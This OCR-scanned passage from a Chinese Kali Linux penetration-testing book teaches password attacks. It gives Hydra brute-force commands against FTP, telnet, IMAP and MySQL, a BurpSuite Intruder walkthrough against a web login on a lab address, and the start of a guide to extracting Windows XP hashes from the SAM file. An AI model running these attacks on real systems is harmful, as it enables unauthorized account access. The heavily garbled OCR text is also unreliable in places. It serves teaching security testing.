图 13-1 一 个 FTP 的 身份 验证 界面 


Favorites EN acccheck 


01 - Information Gathering 
EN cisco-audit... 
02 - Vulnerability Analysis 


iN 
03 - Web Application Analysis Y findmyhash 


04 - Database Assessment ^23 

€^ hydra 
05 - Password Attacks 
e Offline Attacks 


e Online Attacks 


e Passing the Hash tools N 
` onesixtyone 
06 - Wireless Attacks 


À 
atator 
07 - Reverse Engineering 以 P 
iN 


08 - Exploitation Tools EN thc-pptp-b... 
09 - Sniffing & Spoofing 
10 - Post Exploitation 

1 - Forensics 


- Reporting Tools 





[13-2 ”在 Applications 分 类 下 的 Hydra 
Hydra 是 一 款 命令 行 式 的 工具 ， 它 的 命令 格式 如 下 : 


hydra 
[[[-1 LOGIN|-L FILE] [-p PASS|-P FILE|-x OPT]] | [-C FILE]] [-e nsr] 


[-u] [-f] [-F] [-M FILE] [-o FILE] [-t TASKS] [-w TIME] [-W TIME] 
[-s PORT] [-S] [-4/6] [-vV] [-d] 
server service [OPTIONAL SERVICE PARAMETER] 





e 上 向 语法 中 使 用 的 参数 合 义 如 下 : 


-R 根据 上 一 次 进度 继续 破解 

-S 使 用 SSL 协议 连接 

-s PORT TE XE mj H 

-] LOGIN or -L FILE 指定 用 户 名 或 者 指定 用 户 名 字典 (文件 ) ,注意 大 小 与 

-p PASS or -P FILE 指定 密码 破解 或 者 指定 密码 字典 (文件 )， 注 意 大 小 写 

-X MIN:MAX:CHARSET 产生 长 度 从 MIN 到 MAX 的 密码 ，CHARSET 表 示 使 用 的 字符 集 ，1 表 示 
数 








衬 ，a 表 示 小 与 数字 ，A 和 表示 大 写 数 字 
-e nsr n 表 示 使 用 空 密 人 码 探测 ，s 表 示 将 用 户 名 作为 密码 ，r 表 示 将 用 户 名 


倒序 作 
为 密码 
使 用 冒号 分 割 格 式 ， 例 如 “登录 名 :密码 ”来 代替 -LV/-P 参 数 
指定 输出 文件 
在 找到 第 一 个 用 户 名 和 密码 之 后 就 退出 
指定 多 线程 数量 ， 默 认为 16 个 线程 
显示 详细 过 程 

server 目标 ip 


service 指定 服务 名 ， 文 持 的 服务 和 协议 








下 和 面 我 们 束 使 用 Hydra 来 破解 目标 FTP 的 密码 ， 这 个 工具 既 可 以 使 
用 纯 字 和 典 方 式 ， 也 可 以 使 用 完全 又 力 了 破解 方式 。 首 先 按照 第 一 种 方式 来 
笑 斌 破解， 这 里 需要 使 用 到 一 个 字典 文件 ， 你 可 以 在 互联 网 上 下 载 一 个 
字典 文件 ， 也 可 以 使 用 工具 生成 〈 这 部 分 我 们 会 在 本 章 的 最 后 讲 到 ) 。 
这 里 我 从 互联 网 上 下 载 了 一 个 包含 彰 见 弱 口 令 的 字典 文件 ， 名 为 
wordlist.txt。 然 后 将 这 个 文件 放置 在 Downloads 文 件 夹 中 。 好 了 ， 接 下 来 
束 开 始 对 目标 的 破解 ， 这 里 我 们 为 了 市 省 时 间 ， 假 设 事 先 已 经 知道 用 户 
名 为 admin， 只 需 人 破解 密码: 


hydra -l admin -P /root/Downloads/wordlist.txt ftp://192.168.1.103 
图 13-3 给 出 了 执行 的 具体 过 程 。 


- ra -L admin -P /root/Downloads/wordlist.txt ftp://192.168.1.103 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes. 


Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-22 01:51:25 


[DATA] max 16 tasks per 1 server, overall 64 tasks, 2107 login tries (l:1/p:2107 
, ~2 tries per task 

[DATA] attacking service ftp on port 21 

[STATUS] 190.00 tries/min, 190 tries in 00:01h, 2046 to do in 00:11h, 16 active 





图 13-3” Hydra 执行 攻击 的 界面 
如 果 成 功 地 尝试 出 了 用 户 名 和 密码 的 话 ， 结 果 将 会 以 绿 闫 色 显 示 。 


Hydra 得 到 的 结 未 如 图 13-4 所 示 。 


JI ] host: login: password: 


[ 
1 of 1 target successfully completed, 1 valid password found 
ydra (http://www.thc.org/thc-hydra) finished at 2017-10-22 01:52:53 





图 13-4 ” Hydra 得 到 的 结 


接 下 来 ， 我 们 来 笠 试 不 使 用 字典 ， 而 使 用 完全 又 力 人 破解 的 方式 。 假 
设 我 们 知道 密码 为 4 位 ， 而 且 都 为 数字 ， 那 么 就 可 以 使 用 4 : 4 : 1 来 表示 
所 有 的 长 度 为 4 位 的 纯 数字 密码 。 由 于 这 种 破解 方式 很 慢 ， 所 以 这 里 我 
们 将 线程 设置 为 64〈 默 认为 16) 。 这 次 的 破解 命令 如 下 : 


hydra -l admin -x 4:4:1 ftp://192.168.1.103 -t 64 


执行 的 过 程 如 网 13-5 所 示 。 


:~# hydra -L admin -x 4:4:1 ftp://192.168.1.103 -t 64 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes . 





Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-22 02:13:38 

[WARNING] Restorefile (./hydra.restore) from a previous session found, to preven 
t overwriting, you have 10 seconds to abort... 

[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:100 
0), ~2 tries per task 


[DATA] attacking service ftp on port 21 
[21] [ ] host: login: password: 





图 13-5 HydrafA47 EEFJE BE AIA 
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较 大 。 下 和 面 列 出 了 一 些 弟 见 协 议 的 破解 命令 。 


[d 解 telnet 


it hydra 目标 ip 地 址 telnet -1 用 户 名 -P 密码 字典 -s 23 





破解 imap: 





it hydra -L 用 户 名 字典 -P 密码 字典 目标 地 址 service imap 


做 解 mysgq]l : 


# hydra 目标 地 址 mysql -1 root -P 密码 文件 


关于 hydra 的 更 多 评 细 使 用 你 可 以 参阅 
https://www.aldeid.com/wiki/Thc-hydra, X T Web Ui [E H 83 E S BBC OL 
程 ， 我 们 这 里 采用 另 一 种 更 通用 的 工具 BurpSuite 来 进行 讲解 。 


BurpSuite 是 用 于 攻击 Web 应 用 程序 的 集成 平台 。 这 个 平台 中 集成 
了 许多 工具 。 这 一 节 我 们 只 讲述 其 中 的 一 个 重要 功能 ， 束 是 如 何 使 用 它 
来 破解 一 些 网 站 的 密码 。 前 和 完 我 们 先 来 合 看 一 个 有 用 尸 名 和 和 密码 的 登录 
界面 ， 如 图 13-6 所 示 。 


图 13-6 ”一 个 需要 用 户 名 和 密码 的 登录 界面 


接 下 来 我 们 来 简单 地 研究 一 下 这 个 页 面 登录 的 流程 。 简 单 来 说 ， 用 
户 登 录 这 个 页 面 ， 在 这 个 页 面 中 的 两 个 文本 框 中 输入 用 户 名 “admin” 和 
密码 “123456” 之 后 点 击 “ 确 定 ” 按 钮 ， 这 个 页 面 束 会 将 这 个 用 户 
名 “admin” 和 密 伺 “123456” 打 包 成 数据 包 然 后 提交 到 服务 器 端 进行 验 
证 ， 我 们 先 将 这 个 数据 包 称 为 数据 包 A。 


然后 我 们 再 使 用 “admin” 作 为 用 户 名 , “abc123” 作 为 密码 登录 一 次 ， 
这 次 产生 的 数据 包 称 为 数据 包 了 B。 


对 两 个 数据 包 A 和 B 进 行 比较 ， 你 束 会 友 现 其 实 两 个 数据 包 之 间 除 
了 密码 处 不 一 样 之 外 ， 其 他 的 地 方 部 是 一 样 的 。 





那么 可 以 设想 一 下 ， 在 破解 密码 时 只 需要 将 数据 包 A 复 制 10000 
个 ， 然 后 使 用 各 种 可 能 的 密码 ， 例 如 “abcdef”“111111”“000000” 来 答 
换 “123456”， 这 样 就 产生 了 10000 个 只 有 窗 码 项 不 同 的 数据 包 ， 将 这 些 
2S QUAS SU AE UE MAR EIOS ne SONS 3 n] ULIS B 1000077 
密码 中 哪个 是 正确 的 (当然 也 有 可 能 都 不 正确 ， 那 就 需要 你 使 用 更 多 的 
密码 ) 。 不 过 实际 情况 要 比 这 复 茶 一 些 ， 因 为 要 涉及 校 验 码 等 操作 。 


了 解 了 这 个 思路 以 后 ， 我 们 束 可 以 来 具体 实现 这 种 攻击 方式 了 ， 但 
是 我 们 需要 一 个 工具 来 实现 这 一 切 ， 这 里 使 用 BurpSuite 来 作为 工具 ， 首 
先 在 Kali Linux 2 中 启动 这 个 工具 ， 如 图 13-7 所 示 。 


Favorites | burpsuite 


01 - Information Gathering 


(^, commix 
02 - Vulnerability Analysis : 


03 - Web Application Analysis ka ! httrack 
04 - Database Assessment 

owasp-zap 
05 - Password Attacks 
06 - Wireless Attacks je 
07 - Reverse Engineering skipfish 


08 - Exploitation Tools 


z 1 sqlmap 


09 - Sniffing & Spoofing 

10 - Post Exploitation webscarab 
11 - Forensics ax wpscan 
12 - Reporting Tools 

13 - Social Engineering Tools 

14 - System Services 


Usual applications 





图 13-7 ”在 Applications 中 局 动 burpsuite 


BurpSuite 在 这 里 的 主要 作用 是 在 用 户 使 用 的 浏览 句 和 目标 服务 器 之 
间 充 当 一 个 中 间 人 的 角色 。 这 样 当 我 们 在 浏览 器 中 输入 数据 之 后 ， 数 据 
包 就 是 首先 提交 到 BurpSuite 处 ，BurpSuite 可 以 将 这 个 数据 包 进 行 复制 ， 
修改 之 后 再 提交 到 服务 器 处 。 所 以 BurpSuite 此 时 相当 于 一 个 代理 服务 
器 。 不 过 BurpSuite 的 功能 要 比 这 强大 得 多 ， 但 是 这 是 一 葡 商 业 软 件 ， 
Kali Linux 2 中 集成 了 免费 版 ， 所 以 我 们 这 里 只 简单 介绍 它 破 解密 但 的 功 
能 ， 首 先 启动 BurpSuite， 其 工作 界面 如 图 13-8 所 示 。 


Burp Intruder Repeater Window Help 


Burp Suite Free Edition v1.7.17 - Temporary Project 











| Method | URL 





| Params | Sta... à | Length | MIME type 


Ti 


A4 KA 


























i2 pe) por) pem). | Tyoe a search ter 





0 matches 


图 13-8 BurpSuite 的 工作 界面 
其 次 我 们 要 将 BurpSuite 设 置 成 代理 工作 模式 ， 单 击 选项 卡 上 
的 “ProxvVy”。 


Burp Intruder Repeater Window Help 








图 13-9 ”将 BurpSuite 设 置 成 代理 工作 模式 
然后 切换 至 proxy 选 项 卡 的 Option 选 项 下 ， 选 择 127.0.0.1:8080， 如 图 
13-10 所 示 。 


HTTP history 























WebSockets history 
= = A 
图 Proxy Listeners 
© Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of the listeners as its 
server. 
Add | Runnin Interface | Invisible | Redirect | Certificate | 
127.0.0.1:8080 Q Per-host 
Edit 
Remove » 

















图 13-10 ”将 BurpSuite 设 置 为 代理 服务 器 


现在 BurpSuite 成 为 了 一 个 工作 在 8080 端 口上 的 代理 服务 器 ， 接 下 来 


我 们 束 害 要 在 浏览 副 中 将 代理 指定 为 BurpSuite。 


然后 打开 使 用 的 浏览 器 ，Kali Linux 2 中 默认 使 用 的 浏览 器 为 Firefox 
ESR， 人 然后 单 击 右 侧 的 工具 菜单 ， 如 图 13-11 所 示 。 


Kali Linux, an Offensive Security Project - Mozilla Firefox @ © Q 






j Kali Linux, an Offensive S.. x | * 





: )G file:///usr/share/kali-defaults/web/hom C Q Search » 








Eg Most Visited v WllOffensive e X Cut Eg Copy 


[KALI | = 100% + 


Ei eo k 


New Window New Private Save Page 
Window 
= © e 
Print History Full Screen 





Find Add-ons 


图 13-11 在 Firefox 中 设置 代理 C1) 


然后 依次 在 Firefox 中 选中 “Advanced” “Network”Settings”， 如 图 13- 
12 所 示 ， 注 意 每 种 浏 贤 右 中 设置 都 不 一 标 ， 需 要 考虑 上 其 体 情 况 。 


Advanced 
General Data Choices Update Certificates 
Connection 


Configure how Firefox connects to Re Internet 





Cached Web Content 
Your web content cache is currently using 24.8 MB of disk space, Clear Now 
Override automatic cache management 


MB of space 


Offline Web Content and User Data 
Your application cache is currently usin b 












图 13-12 ”在 Firefox 中 设置 代理 (2) 


打开 Setting 工 作 界 和 面 之 后 ， 在 代理 界面 中 进行 设置 ， 选 中 “Manual 
proxy configuration: ”， 在 HTTP Proxy 处 输入 127.0.0.1， 在 Port 处 输入 
8080， 如 图 13-13 上 所 示 。 


KEAK. HEOK’ FX. ARIA AAN a ar 
目标 登录 界面 ， 我 这 里 的 目标 登录 界面 的 地 址 为 


日 是 需要 注音 的 十 此 


http: //192.168.1.103/Webadmin/， 如 图 13-14 所 示 , 1 
时 的 页 面 不 会 有 任何 变化 。 


Connection Settings 
Configure Proxies to Access the Internet 


CD No proxy 
© 2 Auto-detect proxy settings for this network 


O Use system proxy settings 
® Manual proxy configuration: 
HTTP Proxy: Í 127.0.0.1 | Bort: | [soso]: 









































| ] Use this proxy server for all protocols 
SSL Proxy: Port: 0|* 
ETP Proxy: Port: 0|? 
SOCKS Host: Port: 0 | 
O SOCKS v4 (8 SOCKS v5 [Remote DNS 
No Proxy for: 
localhost, 127.0.0.1 
Example: .mozilla.org, .net.nz, 192.168.1.0/24 
© Automatic proxy configuration URL: 
Reload 





|.) Do not prompt for authentication if password is saved 


| = Cancel - | 


图 13-13 ”在 Firefox 中 设置 代理 (3) 





| Hep | 








x | 中 


jJ €* Connecting... 
> 1192.168 1.103/webadmin E | 
Ey Most Visited v Will Offensive Security "X Kali Linux "& Kali Docs "& Kali Tools KiExploit-DB W Aircrack-ng 


| KALI | 








中 输入 目标 地 址 


图 13-14 ”在 浏览 器 
因为 此 时 浏览 右 中 同 目 标 服务 上 如 发 送 的 请 求 都 被 BurpSuite 所 截获 ， 
所 以 现在 服务 右 并 没有 返回 任何 数据 。 我 们 现在 切换 回 BurpSuite， 来 处 


理 截 获 的 数据 包 ， 通 第 有 3 种 方法 ， 妈 放行 (Forward) . EF 
(Drop) 、 操 作 (Action) 。 


Burp Suite Free Edition v1.7.17 - Temporary Pi 
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|| intercept H history | WebSockets history | Options 


P| Request to http://192.168.1.103:80 














GET / HTTP/1.1 
Host: 192.168.1.103 
zilla/5.0 ( X1, Lin 
cept: is et spp ati onte "y EE ation/xml;cr0.9 
n; cp o 


cept-Language: en 
外 


v:45.0) Gecko /20100101 Firefox/45.0 


图 13-15 ”BurpSuite 对 数据 包 的 几 种 操作 


在 这 里 我 们 要 选择 放行 之 前 的 数据 包 ， 这 样 才能 正常 访问 登录 界 
E 执行 的 方法 是 依次 点 击 图 13-15 中 所 示 的 方 框 内 的 “1”2”3” 对 应 的 
HFH 。 





Pune .1U5/WEDa j & 
&y Most Visited v fl Offensive Security Ñ Kali Linux "& Kali Docs ™ Kali Tools 


管理 员 登 陆 











图 13-16 ”目标 登录 界面 


接 下 来 我 们 来 构造 登录 数据 包 ， 在 登录 页 面 中 ， 输 入 一 个 用 户 和 名 
admin 《在 这 个 例子 中 ， 我 们 假设 Ce LE A magna 
未 知 ) ， 密 码 随 意 输 入 一 个 ， 例 如 “000000”， 然 后 单 击 “确定 按钮， 如 


图 13-17 所 示 。 

切换 到 BurpSuite， 这 时 的 “Intercept”* 变 成 员 磊 色 ， 表 示 截 获 到 了 数 
据 包 ， 这 个 数据 包 的 格式 如 下 所 示 ， 最 关键 的 是 红 闫 色 所 括 起 来 的 部 
分 ， 如 图 13-18 所 示 。 


^ 192.168.1.103/webadmii 


e 


Eg Most Visited v WlOffensive Security "X Kali Linux "à, Kali Docs ‘Ñ Kali Tools 





管理 员 有 登录 
APE admin | 
| 确定 | | 重 写 











| orwar | | Drop 31 Intercept is on | | Action | 





POST /webadmin/login. ASP HTTP/1.1 

Host: 192. 168. 1. 103 

User-Agent: Mozilla/5.8 (X11, Li 686; rv: 45.0) Gecko B A p idi x/45.ü 
Accept: text/html,applicati EERE S anl. d ui ation/xml;cpü.5,*^* 

Acc id -Language: en-US, en; cg. 5 

Referer: http: //192.168. i 103/webadm 

ic AUGE EWE EIS OA COE ES 

Connec tion: close 

Content - arn nium atlon/x-www-form-urlencaded 

Content - 





图 13-18 ”截获 到 的 登录 数据 包 


数据 包 其 他 的 部 分 都 是 一 样 的 ， 只 有 红 闫 色 的 部 分 不 一 样 ， 按 照 
们 之 前 的 思路 ， 只 需要 用 字典 中 的 单词 替换 <000000* 即 可 。 BurpSuite 中 


有 相关 的 模块 ， 我 们 只 需要 在 文字 区 域内 单 击 右键 ， 然后 在 弹出 的 这 单 
中 选择 “Send to Intruder”， 如 图 13-19 所 示 。 


然后 单 击 上 面 的 *Intruder 选 项 卡 ， 并 在 其 中 选择 “Positions”， 如 多 
13-20 所 示 。 


Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 
/ xhtml xml, application/xml; c0. 9, */*: cp 0.8 

Pe 

/webadmin/ 
-UBZKBAAGOKUIIKTBSTHJMTBJJQDIFHQJMQAQVVZ 


Send to Spider 


ww -form-urlencoded 


Send to Intruder Ctrl+I 
:00000&Submit=%C8sB7%BEsA8 Send to Repeater 





Send to Sequencer 

Send to Comparer 

Send to Decoder 

Request in browser > 
Engagement tools [Pro version only] E 
Change request method 

Change body encoding 

Copy URL 

Copy as curl command 


Copy to file 


图 13-19 ”将 数据 包 转 到 “Intruder” 模 块 
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Burp Intruder Repeater Window Help 


[wwe T_T 加 sm Te 


Target Payloads 
[Tage f | Payloads | options | 


(2) Payload Positions Start attack | 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads 
are assigned to payload positions - see help for full details. 


Attacktype: | Sniper | x) 


POST /webadmin/login. ASP HTTP/1.1 


Add§ | 
Host: 192. 168. 1. 103 


User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 


Accept: text/html, application/xhtml-*xml, application/xml; FO0.9,*/*, 0.8 Clear $ | 
Accept-Language: en-US, en; FO.5 EE 











Positions 








Referer: http: //192. 168. 1. 103/webadmin/ Auto § | 
Cookie: JXOVCECBSSJAZWHZXLYU- SLUBZKBAAGOKUTTKTBSTHJMTBJJQDIFHQJMQAQVVZS uad 


Connection: close | Li 
Content-Type: application/x-www-form-urlencoded 





Content-Length: 55 


AdminName-SadminS &$AdminPassword-8000008 &Submit-S*S$CB8NB7SBOSABS 











2 n < à * . - Type a search term 0 matches Clear | 


4 payload positions Length: 507 








13-20 “Intruder fx 5 A [B] 


在 这 个 模块 中 ， 我 们 需要 疝 BurpSuite 指 明 密 码 所 在 的 位 置 ， 在 这 个 
操作 界面 中 ，BurpSuite 并 不 能 确切 地 知道 密码 所 在 的 位 置 ， 但 是 它 给 出 
了 4 个 可 能 的 位 置 ， 也 就 是 图 13-20 中 禹 搬 纹 的 部 分 。BurpSuite 中 使 用 一 
对 “$” 来 前 后 表示 密码 的 区 域 ， 我 们 在 这 里 蛙 击 右边 的 “Clear SI, J 
除 所 有 默认 参数 ， 如 图 13-21 所 示 。 


Attacktype: | Sniper |" | 


( = nux 1686; :45.0) Gecko/20100101 Firefox/45.0 
EM EU "ir ati onihtet e zer ati ar xul a8. 9, 9/5: meg. B 
cani s U 
eferer: EE. inaa. 168. n Ti ebadmin/ 
e: m ——— 
los 





€ 
ecti c 
seks nt- paai zn ation/x-www-form-urlencoded 
ontent-Length: 55 


AdminName-admin&AdminPassword-00000&Submit-*sCS*B7*B6*A8 








? < 中 > Type a search term | 0 matches Clear 


图 13-21 单 击 "Clear$" 


然后 我 们 鼠标 移动 到 密码 位 置 ， 也 就 是 “000000” 的 前 面 ， 单 击 按 
钮 ‘Add$”， 再 将 鼠标 移动 到 “000000” 后 面 ， 单 击 按 钮 “Add$”。 这 样 就 成 
LL 也 束 是 一 会 要 用 字典 人 稚 换 的 位 置 ， 如 图 13- 
22HTzR o 





POST /webadmin/login.ASP HTTP/1.1 à 
Host: 192. 168.1. 183 
User-Agent: Mozilla/5.0 (X11; Lin 686; rv:45.0) Gecko appare ied refox/45.0 
Acc elis, te dpi applicati situs ue lir ation/xml; 0. 9, */* 
Accept -La : -US, en; i 
Referer: http: 7/192. 168.1.103/webadmin/ 
Cookie: —————————DÓÀÁ——— 
1 


Connec tion: close 
Content -Type: application/x-www-form-urlencoded 
Content-Length: 55 


AdminName- admin&AdminPassword-8000008/sSubmit-*:CESB7SB6'A8 


图 13-22 设置 完 窗 公 位 置 的 “Intruder” 


切换 到 “Payloads” 选 项 ， 选 择 要 使 用 的 “Payload type", ix E X 
择 要 设 定 进 行 密 人 码 破解 目标 的 个 数 。 例 如 我 们 只 破解 密码 ， 这 里 
Payaload set 的 值 就 是 1， 比 如 我 们 既 不 知道 用 户 名 又 不 知道 密码 的 时 
候 ， 这 里 就 要 选择 2。Payload type 的 类 型 选择 “Simple list”， 如 图 13-23 
所 示 。 








= 


Target | Positions | Options | 
- FI 
图 Payload Sets | Start attack 


You can define one or more payload sets. The number of payload sets depends diim atta vium defined in the Positions tab. 
Various payload types are available for each pa ir ad set, and each paylo ee n be cu zed in different ways. 


Payload set: 1 | 7) Payload count: 0 


Payload type: | Simple list |v | Request count: 0 








图 13-23 ”Payloads 的 操作 界面 


免费 版 比 专业 版 少 了 不 少 功 能 ， 接 下 来 我 们 要 加 入 使 用 的 字典 文 
件 ， 在 如 图 13-24 所 示 的 界面 中 选中 load 按 钮 。 


图 Payload Options [Simple list] 
This payload type lets you configure a simple list of strings that are used as payloads. 





Paste 





Cm )[ | 


Add from list ... [Pro version only] 


图 13-24 ”选择 要 使 用 的 字典 C1) 


在 这 里 我 们 选中 上 一 节 中 下 载 的 wordlist.txt 作 为 破解 的 字典 ， 如 图 
13-25 上 所 示 。 


了 











Look In: ag Downloads M | | Le | | gH Ep- 


| (ni Aptana Studio 3 Setup Linux x86 3.6.1 
[3 Aptana Studio 3 Setup Linux x86 3.6.1.zip 





File Name: wardlist.txt 


| Y 


| Open || Cancel | 


Files af Type: | All Files 


图 13-25 ”选择 要 使 用 的 字典 (2) 


好 了 ， 设 置 完成 之 后 ， 单 击 荣 单 栏 的 “Intruder”， 选 择 “Start 
attack”， 如 图 13-26 所 示 。 


hne Repeater Window Help 


Start attack 


Actively scan defined insertion paints "m ro version only] 
Send to Repeater 

Save attack config [Pro version only] 

Load attack contig [Pro version only] 

Copy attack config 

Hew tab behavior 


Automatic payload postions 





Configure predefined payload lists [Pro version only] 


图 13-26 ”开始 Intruder 攻 击 


好 了 ， 现 在 就 开始 扫 接 了 ， 人 免费 版 由 于 限制 了 多 线程 ， 所 以 进展 得 
十 分 慢 ， 如 图 13-27 所 示 。 


Intruder attack 1 oo o0 | 

















| Req | Payload | Stat Error | Timeo... | Length | Comment 
20 Q O 458 fA 
20 Q O 498 
2 %null% 200 日 OQ 250 
9 username* Q O 250 
@#$ 200 Q O 498 
@#$% D O 250 
(pigs ^ Q O 250 
@#$% 人 ^E 200 Q O 250 
Io 并 囊 % 人 ~ CJ Q 250 
9 00000 200 Q O 498 
00000000 Q O 498 
0123456789 LJ LJ 98 
12 1 200 Q Q 98 
of 21 


图 13-27 ”攻击 过 程 


扫 拉 到 差不多 的 时 候 ， 我 们 可 以 按照 Statu 或 者 Status 或 者 
Length (KÆ) 大 小 排序 。 以 Status 为 例 我 们 会 看 到 所 有 的 数据 包 分 成 
两 种 ， 一 种 为 302， 其 他 的 为 200， 如 图 13-28 所 示 。 当 然 有 时 可 能 会 不 


同 ， 那么 就 需要 查看 一 下 Length 长 度 ， 一 般 Length 长 度 与 大 多 数 数据 包 
不 同 的 就 是 正确 的 。 


| Filter: Showing all terms 


[25 mr 3 日 212 | 

| U UL z= m 15 
1 200 [ss] LJ 498 
2 9 ril 200 =| LJ 250 
3 96 uisernarniets 200 =l E] 250 
4 TE E 200 = LJ 498 
5 PEE ti 200 [ss] LJ 250 
6 1n ded ^ 200 =| LJ 250 
7 [CI IY Rb 200 LJ LJ 250 

|8 Ho dedo ^ 200 | B 250 
9 Do0000 200 = LJ 498 
10 Do000000 200 = B 498 
11 0123456785 200 LJ LJ 498 


图 13-28 ”对 数据 包 发 送 的 结 末 进 行 排序 


使 用 BurpSuite 其 实 是 一 种 十 分 通用 的 办 法 ， 但 是 如 果 目 标 网 站 设置 
了 验证 码 或 者 限制 登录 次 数 的 话 ， 这 种 方法 则 不 适用 了 。 


13.3 HAA RR CREE 


除了 在 登录 认证 时 采用 暴力 穷 举 之 外 ， 保 存 密码 的 数据 库 泄露 也 是 
密码 被 破解 的 主要 原因 。 某 些 网 站 的 安全 机 制 设置 有 缺陷 ， 导 致 自身 的 
关键 数据 库 被 渗透 。 很 多 用 户 在 不 同 网 站 使 用 的 是 相同 的 账号 密码 ， 因 
此 黑客 可 以 通过 获取 用 户 在 A 网 站 的 账户 从 而 尝试 登录 B 网 址 ， 这 就 是 
著名 的 撞 库 攻 击 。 例 如 2014 年 12 月 25 日 开始 在 互联 网 上 疯 传 的 12306 网 
站 用 户 信息 ， 就 是 黑客 通过 “ 撞 库 攻 击 "所 获得 。 


这 种 泄露 的 数据 库 中 的 数据 大 都 是 明文 方式 ， 也 融 是 说 如 果 用 户 的 
密码 是 “999999”， 那 么 保存 在 数据 库 中 的 密码 也 是 “999999”， 这 样 的 
话 ， 如 果 数 据 库 泄露 了 了， 那么 用 户 的 密码 日 然 也 束 汇 露 了 。 不 过 ， 现 在 
的 数据 库 大 都 采用 了 哈 硕 加 密 的 方式 保存 。 例 如 微软 的 Windows 操 作 系 
统 束 采用 哈 希 加 密 的 方式 保存 登录 密码 。 


我 们 经 党 会 有 这 样 的 经 历 ， 在 进行 条 种 认证 的 时 候 ， 突 然 友 现 目 己 
还 记 了 密 权 。 这 个 时 候 只 能 是 重新 设置 一 个 密码 ， 如 果 你 问 服务 人 员 你 
的 密码 时 ， 这 时 候 服 务 人 员 往 往 会 告诉 你 “他 们 也 但 个 到 你 的 密码 ”， 这 
时 你 会 不 会 觉得 可 怪 ， 既 然 服 务 人 员 不 知道 我 的 密码 ， 那 么 他 们 怎么 知 
JEU E E R3 f A e AE BARES] 2 


这 束 古 因为 这 些 密 码 都 是 经 过 了 哈 希 加 密 之 后 保存 到 数据 库 中 ， 密 
公 的 哈 希 值 束 是 对 口令 进行 一 次 性 的 加 密 处 理 而 形成 的 杂乱 字符 串 。 这 
个 加 密 的 过 程 被 认为 是 不 可 逆 的 ， 也 就 是 说 ， 人 们 认为 从 哈 希 值 中 是 不 
可 能 还 原 出 原 口 令 的 。 例 如 ， 密 码 “999999” 经 过 哈 希 加 密 (MD5) 之 后 
就 变 成 了 “52C69E3A57331081823331C4E69D3F2E”。 这 个 哈 希 值 保 存在 
了 数据 库 中 ， 在 进行 验证 的 时 候 ， 我 们 只 需要 将 输入 的 值 经 过 哈 硕 加 窗 
之 后 再 与 保存 的 值 进行 比 较 ， 束 可 以 知道 密码 是 否 正 确 。 但 是 即使 黑客 
获得 了 “52C69E3A57331081823331C4E69D3F2E”， 也 不 能 逆向 还 原 出 原 


来 的 密码 “999999”。 这 样 就 保证 了 保存 密码 的 数据 库 即 使 被 攻破 ， 也 不 


会 导致 密 公 泄露 。 


但 十 现在 由 于 各 种 攻击 手段 的 出 现 ， 哈 硕 加 密 也 并 非 是 安全 的 ， 下 
面 我 们 来 介绍 一 些 弟 见 哈 布 加 窗 的 破解 方法 。 


13.3.4 对 最 基本 的 LM 哈 希 进行 破解 


Windows XP 操作 系统 可 以 说 是 微软 影响 力 最 大 的 产品 ， 虽 然 这 于 
系统 在 大 多 数 人 眼中 已 经 是 老 迈 不 堪 ， 束 连 微软 自己 也 已 经 在 2014 年 宣 
布 放 弃 了 对 其 的 支持 ， 但 是 截止 到 2016 年 世界 上 仍然 有 11.5% 的 计算 机 
在 使 用 它 。 这 个 比例 让 Windows XP 依旧 稳 稳 地 处 于 计算 机 操作 系统 使 
用 率 的 第 3 位 (第 1 位 和 第 2 位 分 别 是 Windows 7 和 Windows 100 。 有 目前 由 
于 软件 兼容 性 的 问题 ， 很 多 政府 部 门 和 银行 仍然 在 使 用 Windows XP. 
因此 即使 在 现在 ， 我 们 仍然 很 有 必要 来 研究 一 下 Windows XP 的 安全 性 


问题 。 


首先 我 们 来 研究 的 就 是 Windows XP 的 密码 安全 。 我 们 对 于 Windows 
XP 开 机 时 或 者 远程 连接 时 的 登录 界面 并 不 陌生 ， 这 个 界面 我 们 需要 输 
入 用 户 名 和 密码 ， 操 作 系统 会 将 我 们 输入 的 信息 与 保存 的 信息 进行 比 
对 ， 如 果 相 同 的 话 ， 就 会 让 我 们 进入 系统 。 那 么 是 不 是 我 们 趁 着 计算 机 
的 主人 离开 计算 机 的 时 候 ， 束 可 以 偷偷 地 将 里 面 保存 的 密码 找 出 来 偷 走 
E? 其 实 我 在 刚刚 接触 计算 机 的 时 候 ， 束 一 下 有 这 个 想法 。 


事实 上 ， 这 个 想法 并 非 是 天 方 夜 齐 ， 因 为 Windows XP 中 确实 保存 
了 了 密码， 而 且 这 个 密码 也 确实 可 以 找到 。 这 个 密码 就 保存 在 了 
C:\windows\system32\confis\SAM 中 。 在 Windows XP 和 Windows 2003 
中 ， 我 们 都 可 以 通过 工具 来 抓 取 到 完整 的 LM HASH。 这 时 我 们 可 以 使 
用 一 蒜 名 为 SAMInside 的 工具 来 完成 这 个 工作 ， 其 工作 界面 如 图 13-29 所 
示 。SAMInside 为 一 球 俄 罗斯 人 出 品 的 Windows 密 人 码 恢 复 软 件 ， 支 持 
Windows NT/2000/XP/ Vista 操 作 系 统 ,主要 用 来 恢复 Windows 的 用 户 登 录 


am he 





图 13-29 SAMInside 的 工作 界面 


需要 注意 的 一 点 是 ，SAMInside 需 要 依 乱 读 取 破 解 的 系统 中 SAM、 
system 两 个 文件 破解 出 用 户 密 人 码 。 这 两 个 文件 均 位 于 
C:\WINDOWS\system32\config 文 件 夹 中 。 但 古 在 操作 运行 时 这 两 个 文件 
是 受到 你 护 的 ， 无 法 进行 读 取 操作 。 因 此 我 们 需要 在 dos 下， 或 者 在 
winpe 下 使 用 这 个 工具 来 人 看 这 个 SAM 文 件 。 


执行 这 个 工具 之 后 ，SAMInside 中 丈 会 显示 出 Windows XP 中 的 密 
fid 


JA Windows XP 是 如 何 对 密码 进行 加 密 的 呢 ? 这 个 系统 及 用 了 一 
